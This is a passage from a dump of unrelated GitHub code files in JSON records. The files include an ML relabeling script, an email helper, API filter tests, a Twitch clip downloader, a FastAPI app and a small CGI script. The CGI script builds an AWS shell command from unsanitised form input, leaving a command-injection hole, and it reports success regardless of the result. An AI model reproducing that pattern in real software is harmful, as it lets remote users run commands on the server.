/ n))\n size = m.weight.size()\n fan_out = size[0] # number of rows\n fan_in = size[1] # number of columns\n m.weight.data.normal_(0.0, np.sqrt(2.0 / (fan_in + fan_out)))\n elif isinstance(m, nn.Linear):\n size = m.weight.size()\n fan_out = size[0] # number of rows\n fan_in = size[1] # number of columns\n m.weight.data.normal_(0.0, np.sqrt(2.0 / (fan_in + fan_out)))\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm1d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n\n\ndef main():\n # Training settings\n parser = parse.define_parser()\n args = parser.parse_args()\n print(args)\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n kwargs = {'num_workers': 3, 'pin_memory': True} if use_cuda else {}\n\n print('==> Loading data set..')\n trainset = datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ]))\n testset = datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ]))\n\n # polluting trainset\n trainset_noisy = utility.polluting_dataset(trainset, args)\n\n obs_pred_accur = np.zeros(args.retrain_times)\n LoR_sel = np.zeros(args.retrain_times)\n test_acurr_selected = np.zeros(args.retrain_times)\n\n old_LoR_sel = 0\n\n plt.ion()\n\n for i in range(args.retrain_times):\n model = Net().to(device)\n\n # man-made reverse samples via label-shifting operation\n dataset_with_pure_error, reverse_set, leftover_set = \\\n utility.prepare_reverse_samples_for_dataset(trainset_noisy, testset, args.beta, args.mix_samp)\n\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n\n loss_rec = np.zeros(args.epoch_num_sel)\n avg_train_accur = np.zeros(args.epoch_num_sel)\n reverse_acurr = np.zeros(args.epoch_num_sel)\n leftover_acurr = np.zeros(args.epoch_num_sel)\n test_acurr = np.zeros(args.epoch_num_sel)\n LoR = np.zeros(args.epoch_num_sel)\n old_LoR = 0\n\n loss_R = np.zeros(args.epoch_num_sel)\n loss_L = np.zeros(args.epoch_num_sel)\n loss_LoR = np.zeros(args.epoch_num_sel)\n loss_test = np.zeros(args.epoch_num_sel)\n\n # LIMITED GRADIENT DESCENT\n for epoch in range(args.epoch_num_sel):\n tic = time.time()\n loss_rec[epoch], avg_train_accur[epoch] = train(args, model, device, dataset_with_pure_error, optimizer, kwargs)\n reverse_acurr[epoch], _, loss_R[epoch] = test(args, model, device, reverse_set, kwargs)\n leftover_acurr[epoch], _, loss_L[epoch] = test(args, model, device, leftover_set, kwargs)\n test_acurr[epoch], _, loss_test[epoch] = test(args, model, device, testset, kwargs)\n LoR[epoch] = leftover_acurr[epoch] / (reverse_acurr[epoch] + 0.00000001)\n\n torch.save({'avg_train_accur': avg_train_accur[0:epoch+1],\n 'reverse_acurr': reverse_acurr[0:epoch+1],\n 'leftover_acurr': leftover_acurr[0:epoch+1],\n 'test_acurr': test_acurr[0:epoch+1]}, 'save_train_curve_once_train.pt')\n\n # output the model according to maximum LoR\n if LoR[epoch] > old_LoR:\n old_LoR = LoR[epoch]\n model_output = copy.deepcopy(model)\n best_epoch_number = epoch\n test_acurr_selected[i] = test_acurr[epoch]\n LoR_sel[i] = LoR[epoch]\n\n toc = time.time()\n\n print('Epoch: {} Loss:{:.4f} train corr rate:{:.4f} test corr rate: {:.4f} pure error corr rate: {:.4f} leftover corr rate: {:.4f} LoR: {:.4f} best_epoch_number: {} time: {:.5f}'.format(\n epoch, 
loss_rec[epoch], avg_train_accur[epoch], test_acurr[epoch], reverse_acurr[epoch], leftover_acurr[epoch], LoR[epoch], best_epoch_number, toc - tic))\n\n if args.disp_detail == 'True':\n plt.figure(1)\n plt.plot(np.arange(epoch+1), avg_train_accur[0:epoch+1], 'blue',\n np.arange(epoch+1), test_acurr[0:epoch+1], 'red',\n np.arange(epoch + 1), reverse_acurr[0:epoch + 1], 'green',\n np.arange(epoch + 1), leftover_acurr[0:epoch + 1], 'pink'\n )\n plt.title('Accuracies')\n\n plt.figure(2)\n plt.plot(np.arange(epoch+1), LoR[0:epoch+1],'blue')\n plt.title('LoR')\n plt.pause(0.1)\n\n if args.disp_detail == 'True':\n plt.close(1)\n plt.close(2)\n\n # cover trainset type to testset type for using test data DataLoader\n trainset_noisy_for_test = utility.trainset_to_testset(trainset_noisy, testset)\n accur_for_trainset_noisy, pred_labels,_ = test(args, model_output, device, trainset_noisy_for_test, kwargs)\n\n obs_pred_accur[i] = pred_labels.eq(trainset.train_labels).sum().float().div(len(trainset))\n trainset_noisy.train_labels = pred_labels\n\n print('Re-train times: {} LoR sel:{:.4f} trainset prdc accur(only observe):{:.4f} test acurr rate selected:{:.4f}'.format(\n i, LoR_sel[i], obs_pred_accur[i], test_acurr_selected[i]))\n plt.figure(3)\n plt.plot( np.arange(i + 1), LoR_sel[0:i + 1], 'red')\n plt.title('LoR selected')\n plt.grid()\n plt.figure(4)\n plt.plot(np.arange(i + 1), obs_pred_accur[0:i + 1], 'blue',\n np.arange(i + 1), test_acurr_selected[0:i + 1], 'red')\n plt.title('prediction accuracy of trainset and testset')\n plt.grid()\n plt.pause(0.01)\n\n if LoR_sel[i] > old_LoR_sel:\n old_LoR_sel = LoR_sel[i]\n torch.save(model_output, 'mnist_model.pt')\n test_accur_rec = test_acurr_selected[i]\n i_rec = i\n\n print('output test accur: %.4f corresponding times %d' % (test_accur_rec, i_rec))\n\nif __name__ == '__main__':\n main()","repo_name":"litsycn/Limited_Gradient_Desent","sub_path":"LGD_relabeling.py","file_name":"LGD_relabeling.py","file_ext":"py","file_size_in_byte":11009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30516571316","text":"\"\"\"\nLow level abstraction over smtplib for sending emails from the Aurora\n\nIt looks like you don't need to specify passwords to send emails which simplifies things a lot\n\"\"\"\n\nimport smtplib\nfrom base64 import b64encode\nfrom logging import getLogger\nfrom os.path import basename\n\nfrom airbox import config\n\nlogger = getLogger(__name__)\n\nMAX_LINE_WIDTH = 76\nMARKER = \"AUNIQUEMARKER\"\n\nBODY_SEC = \"\"\"Content-Type: text/plain\nContent-Transfer-Encoding:8bit\n\n{}\n\n--{}\n\"\"\"\n\nATTACHMENT_SEC = \"\"\"Content-Type: {}; name=\\\"{}\\\"\nContent-Transfer-Encoding:base64\nContent-Disposition: attachment; filename={}\n\n{}\n\n--{}\"\"\"\n\n\ndef encode_attachment(fname, content_type='application/pdf'):\n # Read a file and encode it into base64 format\n fo = open(fname, \"rb\")\n filecontent = fo.read()\n\n b64 = b64encode(filecontent).decode()\n\n # Convert to a fixed line width\n l = \"\"\n num_lines = len(b64) // MAX_LINE_WIDTH\n for i in range(num_lines + 1):\n l += b64[i * MAX_LINE_WIDTH:(i + 1) * MAX_LINE_WIDTH] + '\\n'\n\n # Define the attachment section\n return ATTACHMENT_SEC.format(content_type, basename(fname), basename(fname), l, MARKER)\n\n\ndef generate_header(params):\n tags = \"\\n\".join([\"{}: {}\".format(k, v) for k, v in params])\n return tags + \"\\n\\n--{}\\n\".format(MARKER)\n\n\ndef addrs_to_list(to):\n return \", \".join(['<{}>'.format(t) for t in 
to])\n\n\ndef sendmail(to, subject, content, attachments=None, cc=None):\n from_addr = config['email_from']\n if attachments is None:\n attachments = []\n\n # Create the header\n header_kwargs = [\n (\"From\", from_addr),\n (\"To\", addrs_to_list(to)),\n (\"Subject\", subject),\n (\"MIME-Version\", \"1.0\"),\n (\"Content-Type\", 'multipart/mixed; boundary=\"{}\"'.format(MARKER))\n ]\n if cc is not None:\n header_kwargs.insert(2, (\"CC\", addrs_to_list(cc)))\n header = generate_header(header_kwargs)\n\n # Define the message action\n body = BODY_SEC.format(content, MARKER)\n\n message = header + body + \\\n \"\\n\".join([encode_attachment(fname, content_type) for content_type, fname in attachments]) + '--'\n logger.info('Sending message \"{}\" to {}. Total size: {}KB'.format(subject, addrs_to_list(to), len(message) / 1024))\n logger.debug(message)\n if not config['debug']:\n try:\n smtp = smtplib.SMTP('147.66.72.6') # smtp.aad.gov.au ip - DNS incorrectly configured on ship\n smtp.sendmail(from_addr, to, message)\n except smtplib.SMTPException:\n logger.exception('Failed to send message:\\n{}'.format(message))\n raise\n else:\n logger.info('Skipping sending email due to debug mode')\n","repo_name":"lewisjared/airbox","sub_path":"airbox/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71073722988","text":"from itertools import chain\nfrom time import sleep\nfrom datetime import datetime\nfrom uuid import uuid4\nfrom tests.system_tests import fsmRequests, base_test_class, handlers_examples\nfrom tests.system_tests.test_data_option import *\n\n\nclass TestEvents(base_test_class.BaseTest):\n name = 'test_visionlabs_test_events_class'\n events = {}\n\n @classmethod\n def setUpClass(cls):\n # create lists\n reply = cls.lunaClient.createList('descriptors', cls.name)\n assert reply.statusCode == 201, reply.statusCode\n inputListDescriptors = reply.body['list_id']\n\n reply = cls.lunaClient.createList('persons', cls.name)\n assert reply.statusCode == 201, reply.statusCode\n inputListPersons = reply.body['list_id']\n\n reply = cls.lunaClient.createList('persons', cls.name)\n assert reply.statusCode == 201, reply.statusCode\n outputList = reply.body['list_id']\n\n # create descriptors\n for d in descriptorsImgs_search:\n reply = cls.lunaClient.extractDescriptors(filename=d)\n assert reply.statusCode == 201, reply.statusCode\n dId = reply.body[\"faces\"][0][\"id\"]\n\n reply = cls.lunaClient.linkListToDescriptor(dId, inputListDescriptors)\n assert reply.statusCode == 204, reply.statusCode\n\n # create persons\n for p in personsImgs_search:\n reply = cls.lunaClient.createPerson(cls.name)\n assert reply.statusCode == 201, reply.statusCode\n pId = reply.body['person_id']\n cls.personsToDelete += [pId]\n\n reply = cls.lunaClient.extractDescriptors(filename=p)\n assert reply.statusCode == 201, reply.statusCode\n dId = reply.body[\"faces\"][0][\"id\"]\n\n reply = cls.lunaClient.linkDescriptorToPerson(pId, dId)\n assert reply.statusCode == 204, reply.statusCode\n\n reply = cls.lunaClient.linkListToPerson(pId, inputListPersons)\n assert reply.statusCode == 204, reply.statusCode\n\n # remember last person data\n cls.sim_person = pId\n cls.sim_descriptor = dId\n\n # create handlers\n reply = fsmRequests.createHandler(handlers_examples.searchHandlerTestEvents(\n cls.name, 'events', inputListDescriptors, inputListPersons, outputList\n ))\n assert reply.statusCode == 201, 
reply.statusCode\n handler_events = reply.json['handler_id']\n\n reply = fsmRequests.createHandler(handlers_examples.searchHandlerTestEvents(\n cls.name, 'groups', inputListDescriptors, inputListPersons, outputList\n ))\n assert reply.statusCode == 201, reply.statusCode\n handler_groups = reply.json['handler_id']\n\n # send two fake events with another create_time, user_data, source, age and gender but same handler_id\n reply = fsmRequests.emitEvent(handler_events, personsImgs_search[0], {'user_data': \"fake\", 'source': \"fake\"})\n assert reply.statusCode == 201, reply.json\n reply = fsmRequests.emitEvent(handler_events, personsImgs_search[0], {'user_data': \"fake\", 'source': \"fake\",\n 'tags': 'fake'})\n assert reply.statusCode == 201, reply.json\n sleep(1)\n\n cls.start = datetime.now().isoformat('T').split('.')[0] + 'Z'\n reply = fsmRequests.emitEvent(handler_events, events_search[0], {'user_data': cls.name, 'source': cls.name,\n 'tags': cls.name + ',' + cls.name + '1'})\n assert reply.statusCode == 201, reply.body\n cls.events['simple'] = reply.json['events'][0]\n\n reply = fsmRequests.emitEvent(handler_groups, events_search[0], {'user_data': cls.name, 'source': cls.name})\n assert reply.statusCode == 201, reply.body\n cls.events['grouping'] = reply.json['events'][0]\n\n sleep(1)\n\n cls.stop = datetime.now().isoformat('T').split('.')[0] + 'Z'\n\n def assertSearch(self, result, filtersOk, filtersNOk):\n defaultFilters = {\n 'handler_ids': result['handler_id']\n }\n if any(f in chain(filtersOk, filtersNOk) for f in defaultFilters):\n defaultFilters = {}\n\n # TP - FP\n reply = fsmRequests.searchEvents({**defaultFilters, **filtersOk})\n self.assertEqual(reply.statusCode, 200, reply.statusCode)\n self.assertEqual(reply.json['total'], 1, reply.json['total'])\n self.assertEqual(reply.json['hits'][0], result, reply.json['hits'][0])\n\n # TN - FN\n reply = fsmRequests.searchEvents({**defaultFilters, **filtersNOk})\n self.assertEqual(reply.statusCode, 200, reply.statusCode)\n if 'page' in filtersNOk:\n self.assertEqual(len(reply.json['hits']), 0, len(reply.json['hits']))\n else:\n self.assertEqual(reply.json['total'], 0, reply.json['total'])\n\n def test_id(self):\n eId = self.events['simple']['id']\n\n reply = fsmRequests.getEvent(eId)\n self.assertEqual(reply.statusCode, 200, reply.statusCode)\n self.assertEqual(reply.json, self.events['simple'], reply.json['source'])\n\n def test_time_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n },\n {\n 'create_time__gt': self.stop,\n }\n )\n\n def test_gender_filter(self):\n gender = round(self.events['simple']['extract']['attributes']['gender'])\n\n self.assertSearch(\n self.events['simple'],\n {\n 'gender': gender\n },\n {\n 'gender': int(not gender),\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n }\n )\n\n def test_handler_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'handler_ids': str(uuid4()) + ',' + self.events['simple']['handler_id'],\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n },\n {\n 'handler_ids': str(uuid4()) + ',' + str(uuid4()),\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n }\n )\n\n def test_age_filter(self):\n age = int(self.events['simple']['extract']['attributes']['age'])\n ages = age, age + 1\n\n self.assertSearch(\n self.events['simple'],\n {\n 'age__gt': ages[0],\n 'age__lt': ages[1]\n },\n {\n 'age__gt': ages[1]\n }\n )\n\n def test_source_filter(self):\n 
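# the sources filter is a comma-separated list; an event matches if its source equals any listed value\n 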
self.assertSearch(\n self.events['simple'],\n {\n 'sources': self.events['simple']['source'] + ',' + 'test_Abudabi'\n },\n {\n 'sources': 'test_Abudabi,test_Abudabi'\n }\n )\n\n def test_similarity_filter(self):\n sim = round(self.events['simple']['search'][1]['candidates'][0]['similarity'], 3)\n self.assertSearch(\n self.events['simple'],\n {\n 'similarity__lt': sim + 0.001,\n 'similarity__gt': sim - 0.001\n },\n {\n 'similarity__lt': 0\n }\n )\n\n def test_group_filter(self):\n self.assertSearch(\n self.events['grouping'],\n {\n 'group_id': self.events['grouping']['group_id'],\n },\n {\n 'group_id': str(uuid4()),\n }\n )\n\n def test_sim_descriptor_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'sim_descriptor': self.sim_descriptor\n },\n {\n 'sim_descriptor': str(uuid4())\n }\n )\n\n def test_sim_person_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'sim_person': self.sim_person\n },\n {\n 'sim_person': str(uuid4())\n }\n )\n\n def test_sim_list_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'sim_list': self.events['simple']['search'][0]['list_id'],\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n },\n {\n 'sim_list': str(uuid4())\n }\n )\n\n def test_sim_user_data(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'sim_user_data': self.name,\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n },\n {\n 'sim_user_data': 'test_Abudabi',\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n }\n )\n\n def test_user_data_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'user_data': self.name\n },\n {\n 'user_data': 'test_Abudabi'\n }\n )\n\n def test_pagination_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'page_size': 1,\n 'page': 1,\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n },\n {\n 'page_size': 1,\n 'page': 2,\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n }\n )\n\n def test_tag_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'tags': self.name\n },\n {\n 'tags': self.name[:-1]\n }\n )\n\n def test_tags_filter(self):\n self.assertSearch(\n self.events['simple'],\n {\n 'tags': self.name + '1' + ',' + self.name\n },\n {\n 'tags': self.name[:-1] + ',' + self.name\n }\n )\n\n def test_wrong_id(self):\n eId = '123'\n reply = fsmRequests.getEvent(eId)\n self.assertEqual(reply.statusCode, 404, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12021, 'detail': 'Page not found'}, reply.json)\n\n def test_wrong_time_filter(self):\n stop = start = 'Abudabi'\n reply = fsmRequests.searchEvents({'create_time__gt': start})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'create_time__gt'\"},\n reply.json)\n reply = fsmRequests.searchEvents({'create_time__lt': stop})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'create_time__lt'\"},\n reply.json)\n\n def test_wrong_gender_filter(self):\n gender = 'Abudabi'\n reply = fsmRequests.searchEvents({'gender': gender})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'gender'\"},\n reply.json)\n\n def test_wrong_handler_filter(self):\n handler_id = 'Abudabi'\n reply = fsmRequests.searchEvents({'handler_ids': handler_id})\n 
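# a malformed handler id must be rejected with HTTP 400 and error code 12012\n 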
self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'handler_ids'\"},\n reply.json)\n\n def test_wrong_age_filter(self):\n age__lt = age__gt = 'Abudabi'\n reply = fsmRequests.searchEvents({'age__gt': age__gt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'age__gt'\"},\n reply.json)\n reply = fsmRequests.searchEvents({'age__lt': age__lt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'age__lt'\"},\n reply.json)\n\n def test_wrong_similarity_filter(self):\n similarity__gt = similarity__lt = 'Abudabi'\n reply = fsmRequests.searchEvents({'similarity__lt': similarity__lt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'similarity__lt'\"},\n reply.json)\n reply = fsmRequests.searchEvents({'similarity__gt': similarity__gt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'similarity__gt'\"},\n reply.json)\n\n def test_wrong_group_id_filter(self):\n group_id = 'Abudabi'\n reply = fsmRequests.searchEvents({'group_id': group_id})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'group_id'\"},\n reply.json)\n\n def test_wrong_external_id_filter(self):\n external_id = 'Abudabi'\n reply = fsmRequests.searchEvents({'external_id': external_id})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'external_id'\"},\n reply.json)\n\n def test_wrong_sim_descriptor_filter(self):\n sim_descriptor = 'Abudabi'\n reply = fsmRequests.searchEvents({'sim_descriptor': sim_descriptor})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'sim_descriptor'\"},\n reply.json)\n\n def test_wrong_sim_person_filter(self):\n sim_person = 'Abudabi'\n reply = fsmRequests.searchEvents({'sim_person': sim_person})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'sim_person'\"},\n reply.json)\n\n def test_wrong_person_id_filter(self):\n person_id = 'Abudabi'\n reply = fsmRequests.searchEvents({'person_id': person_id})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'person_id'\"},\n reply.json)\n\n def test_wrong_page_filter(self):\n page = 'Abudabi'\n reply = fsmRequests.searchEvents({'page': page})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'page'\"},\n reply.json)\n\n def test_wrong_page_size_filter(self):\n page_size = 'Abudabi'\n reply = fsmRequests.searchEvents({'page_size': page_size})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'page_size'\"},\n 
reply.json)\n","repo_name":"qonteo/luna","sub_path":"fsm2_linux_rel_v.2.0.0/tests/system_tests/unittests_events_filters.py","file_name":"unittests_events_filters.py","file_ext":"py","file_size_in_byte":15760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22947632306","text":"import re\nimport urllib.request\nimport requests\nimport sys\n\nbasepath = 'downloads/'\nbase_clip_path = 'https://clips-media-assets2.twitch.tv/'\n\n\ndef retrieve_mp4_data(slug):\n cid = sys.argv[1]\n clip_info = requests.get(\n \"https://api.twitch.tv/helix/clips?id=\" + slug,\n headers={\"Client-ID\": cid}).json()\n thumb_url = clip_info['data'][0]['thumbnail_url']\n title = clip_info['data'][0]['title']\n slice_point = thumb_url.index(\"-preview-\")\n mp4_url = thumb_url[:slice_point] + '.mp4'\n return mp4_url, title\n\n\ndef dl_progress(count, block_size, total_size):\n percent = int(count * block_size * 100 / total_size)\n sys.stdout.write(\"\\r...%d%%\" % percent)\n sys.stdout.flush()\n\n\n# for each clip in clips.txt\nfor clip in open('clips.txt', 'r'):\n slug = clip.split('/')[3].replace('\\n', '')\n mp4_url, clip_title = retrieve_mp4_data(slug)\n regex = re.compile('[^a-zA-Z0-9_]')\n clip_title = clip_title.replace(' ', '_')\n out_filename = regex.sub('', clip_title) + '.mp4'\n output_path = (basepath + out_filename)\n\n print('\\nDownloading clip slug: ' + slug)\n print('\"' + clip_title + '\" -> ' + out_filename)\n print(mp4_url)\n urllib.request.urlretrieve(mp4_url, output_path, reporthook=dl_progress)\n print('\\nDone.')\n\nprint('Finished downloading all the videos.')\n","repo_name":"amiechen/twitch-batch-loader","sub_path":"batchloader.py","file_name":"batchloader.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"37"} +{"seq_id":"72175872427","text":"from django.conf.urls import url\nfrom .views import *\n\nurlpatterns = [\n url(r'^$', view_home, name='home'),\n url(r'^subscriptions/e/(\\d+)/(.+)/$', ManageEmailSubscriptions.as_view(), name='subscriptions_email'),\n url(r'^subscriptions/j/(\\d+)/(.+)/$', ManageJaneusSubscriptions.as_view(), name='subscriptions_janeus'),\n url(r'^subscriptions/done/$', subscriptions_done),\n url(r'^subscriptions/u/(.+)/$', unsubscribe_landing),\n url(r'^subscriptions/a/(.+)/$', unsubscribe_sendmail),\n url(r'^subscriptions/U/(.+)/$', unsubscribe_unsub),\n url(r'^view/(\\d+)/$', view_newsletter, name='view_newsletter'),\n url(r'^test/(\\d+)$', test_newsletter, name='test_newsletter'),\n url(r'^prepare/(\\d+)$', prepare_sending, name='prepare_sending'),\n url(r'^process/(\\d+)$', process_sending, name='process_sending'),\n url(r'^list/$', list_all, name='list_all'),\n url(r'^css/(\\d+)$', get_css, name='get_css'),\n]\n","repo_name":"jonge-democraten/hemres","sub_path":"hemres/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19613175555","text":"import uvicorn\nfrom fastapi import FastAPI\nfrom fastapi.openapi.utils import get_openapi\nfrom model import AirlineModel, Airline\n\n# Create the app and model objects\napp = FastAPI(swagger_ui_parameters={\"syntaxHighlight.theme\": \"obsidian\"})\nmodel = AirlineModel()\n\n@app.get('/')\ndef index():\n return {'message': 'Hello, traveler!'}\n# Expose prediction functionality: make a prediction from the inputted\n# airline name 
and return the predicted sentiment\n\n@app.get('/predict/{name}')\ndef predict_sentiment(name):\n airline = Airline()\n data = airline.dict()\n if name.upper() not in data.keys():\n return \"This airline does not exist in the data.\"\n data.update({name.upper() : 1})\n pred = model.predict_sentiment(data)\n if pred == 1:\n sentiment = \"positive\"\n else:\n sentiment = \"negative\"\n return {\n 'prediction': sentiment\n }\n\ndef custom_openapi():\n if app.openapi_schema:\n return app.openapi_schema\n openapi_schema = get_openapi(\n title=\"Airline Sentiment Analysis\",\n version=\"1.0.0\",\n description=\"Find sentiments for airlines\",\n routes=app.routes,\n )\n openapi_schema[\"info\"][\"x-logo\"] = {\n \"url\": \"https://fastapi.tiangolo.com/img/logo-margin/logo-teal.png\"\n }\n app.openapi_schema = openapi_schema\n return app.openapi_schema\n\n# Install the custom schema generator before the server starts\napp.openapi = custom_openapi\n\n# Run the API with uvicorn on http://127.0.0.1:8000\nif __name__ == '__main__':\n uvicorn.run(app, host='127.0.0.1', port=8000)\n","repo_name":"Sora34CE/Airline_Sentiment","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70253921066","text":"#!/usr/bin/python3\nprint(\"content-type:text/html\")\nprint()\n\nimport subprocess\nimport cgi\ny = cgi.FieldStorage()\nvi=y.getvalue(\"vid\")\nii=y.getvalue(\"id\")\nout = subprocess.getoutput(\"aws ec2 attach-volume --instance-id {} --volume-id {} --device /dev/sdc\".format(ii,vi))\nout=\"YOUR VOLUME WITH id={} ATTACHED TO INSTANCE WITH id={}!!!\".format(vi,ii)\nprint(out)\n","repo_name":"shrishtikapoor01/ARTH-TASK-8","sub_path":"ebs2.py","file_name":"ebs2.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14859194981","text":"import psutil\n\nimport sys\n\nclass Statusbar(object):\n \"\"\"\n Creates a progress bar.\n\n Parameters\n ----------\n num_tasks: int\n Total number of tasks to be completed.\n title: str, optional\n Title for progress bar. Default is None.\n barsize: int, optional\n Total number of bars to use for length of progress bar. Default is\n 50.\n mem_monitor: bool, optional\n Include a display of available memory and abort execution if\n available memory drops below threshold.\n mem_thresh: int, optional\n If available memory drops below this level, execution is aborted.\n Units are in GB. 
Default is 1.\n\n Returns\n -------\n None\n \"\"\"\n\n def __init__(self, num_tasks, title=None, barsize=50, mem_monitor=False,\n mem_thresh=1):\n self._title = title\n self._barsize = barsize\n self._num_tasks = num_tasks\n self._mem_monitor = mem_monitor\n self._mem_thresh = mem_thresh * 1024 * 1024 * 1024\n\n def initialize(self):\n sys.stdout.write('\\r')\n if self._title is not None:\n sys.stdout.write(self._title + '\\n')\n sys.stdout.write('[{:{}s}] {}%'.format('=' * 0, self._barsize, 0))\n if self._mem_monitor:\n memory_stats = psutil.virtual_memory()\n available = memory_stats.available\n sys.stdout.write('\\nAvailable Memory: {:.2f}GB'.format(available/10**9))\n sys.stdout.flush()\n\n def update(self, bars):\n fraction_complete = bars/float(self._num_tasks)\n increment = int(self._barsize * fraction_complete)\n percent_increment = 100 * fraction_complete\n if self._mem_monitor:\n sys.stdout.write('\\033[F')\n sys.stdout.write('\\r')\n sys.stdout.write('[{:{}s}] {:.2f}%'.format('=' * increment, self._barsize, percent_increment))\n if self._mem_monitor:\n memory_stats = psutil.virtual_memory()\n available = memory_stats.available\n if available < self._mem_thresh:\n raise MemoryError('Not enough memory available to continue. Aborting.')\n #sys.exit()\n else:\n sys.stdout.write('\\nAvailable Memory: {:.2f}GB'.format(available/10**9))\n sys.stdout.flush()\n\n","repo_name":"jzeitoun/scanbox-analysis","sub_path":"python/statusbar.py","file_name":"statusbar.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6800102998","text":"def combinations(k, m, n):\n pool = tuple(\"a\" * k + \"b\" * m + \"c\" * n)\n n = len(pool)\n indices = list(range(4))\n _ = tuple(pool[i] for i in indices)\n count = 0\n if 'a' in _ and 'b' in _ and 'c' in _:\n count += 1\n while True:\n for i in reversed(range(4)):\n if indices[i] != i + n - 4:\n break\n else:\n return count\n indices[i] += 1\n for j in range(i + 1, 4):\n indices[j] = indices[j - 1] + 1\n\n _ = tuple(pool[i] for i in indices)\n if 'a' in _ and 'b' in _ and 'c' in _:\n count += 1\n\n\nprint(combinations(*[int(i) for i in input().split(\" \")]))\n","repo_name":"vladyar334/YandexLyceum","sub_path":"AI_EntranceTest/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14129120975","text":"pars = default_pars_single() # get default parameters\n\n# set your external input and wEE\npars['I_ext'] = 0.5\npars['w'] = 5.0\n\nr = np.linspace(0, 1, 1000) # give the values of r\n\n# Calculate drEdt\ndrdt = (-r + F(pars['w'] * r + pars['I_ext'],\n pars['a'], pars['theta'])) / pars['tau']\n\nwith plt.xkcd():\n plot_dr_r(r, drdt)\n\n # Calculate the first fixed point with your initial value\n x_fp_1 = my_fp_single(pars, 0.)\n if check_fp_single(pars, x_fp_1):\n plt.plot(x_fp_1, 